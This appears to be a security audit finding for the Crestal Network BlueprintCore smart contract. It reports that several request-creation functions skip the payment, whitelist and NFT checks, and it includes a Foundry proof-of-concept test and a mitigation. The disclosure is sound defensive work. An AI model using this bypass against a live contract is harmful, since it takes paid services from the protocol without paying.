Wild Champagne Griffin

High

# Users can create as many requests as they want and assign workers to it OR even leave it for workers to pick and generated proofs submitted, without paying a dime.

### Summary

createProjectIDAndDeploymentRequest(), createProjectIDAndDeploymentRequestWithSig()

The two functions above allows the creation and deployment of requests without payment of ERC20 or being whitelisted or owing an NFT.

These requests can be picked up by workers, and have workers submit proofs for them.

Worst off is that createProjectIDAndPrivateDeploymentRequest() can create a request, assign a private worker and then have the worker submit proof for such request. The only downside is that such request can't be reset after proofs have been generated

### Root Cause

In createProjectIDAndDeploymentRequest(), createProjectIDAndDeploymentRequestWithSig(), createProjectIDAndPrivateDeploymentRequest()

The above functions uses internal createCommonProjectIDAndDeploymentRequest() to create a projectId and deploy a request. This internal function likewise uses deploymentRequest() to deploy request, where request status is set, deployWorkerAddr is set (for createProjectIDAndPrivateDeploymentRequest())  and request is save to contract state [https://github.com/sherlock-audit/2025-03-crestal-network/blob/main/crestal-omni-contracts/src/BlueprintCore.sol#L315-L323](url)

Through out this process, no payment is charged, no whitelisted check is made for the userAddr, no nft ownership check is made.

This allows creation of requests with private worker, creation of request with status (Status.Issued) for workers to pick up. These workers can then submit proofs for such request deployment.

The only downside is that updateWorkerDeploymentConfigCommon() can't be used on such request(This won't be possible cos such request wasn't created though createAgent() which sets ownership for a request - [https://github.com/sherlock-audit/2025-03-crestal-network/blob/main/crestal-omni-contracts/src/BlueprintCore.sol#L452](url) for nftOwners AND https://github.com/sherlock-audit/2025-03-crestal-network/blob/main/crestal-omni-contracts/src/BlueprintCore.sol#L472 for payment using ERC20 tokens)

### Internal Pre-conditions

1. No condition is needed.

### External Pre-conditions

None

### Attack Path

All what user has to do, is that they don't have to go through the route of any function that calls createAgent().

### Impact

The protocol suffers huge losses, as this allows creation and deployment of requests and proofs submitted without payment, owing NFT or being whitelisted.

### Tools used
Manual Review and Foundry

### PoC

```solidity
       
       function test_createRequestAndSubmitProofWithoutPayingToken() public {
        string memory base64Proposal = "test base64 proposal";
        string memory serverURL = "http://example.com";

        // Generate the signature
        (bytes memory signature, address signerAddress) = generateSignature(projectId, base64Proposal, serverURL);

        // Add the payment address
        blueprint.addPaymentAddress(address(mockToken));

        // set zero cost for create agents, use any number less than 0
        uint256 validTokenAmount = 100 * 10 ** 18;
        blueprint.setCreateAgentTokenCost(address(mockToken), validTokenAmount);

        //user creates project and deploy with private worker
        vm.startPrank(address(1));

        // Create agent with token
        bytes32 requestId = blueprint.createProjectIDAndPrivateDeploymentRequest(
            projectId, base64Proposal, address(2), serverURL
        );
        vm.stopPrank();

        vm.startPrank(address(2));
        //proof
        string memory proof = "is_proof";
        // Worker submits proof for deployment
        blueprint.submitProofOfDeployment(
            projectId, requestId, proof
        );
        vm.stopPrank();

        assertEq(blueprint.getDeploymentProof(requestId), proof);
    }
```

Add the above function to BlueprintV5.t.sol, and run forge test test/BlueprintV5.t.sol

The above test will pass, showing that if users don't want to reset a requestId, they can create one, worker works and submit proof of deployment, without any payment or NFT check.

### Mitigation

The protocol team should have the same checks for payment cost OR if caller has an NFT (which can be set to used when these methods are used) OR caller is whitelisted.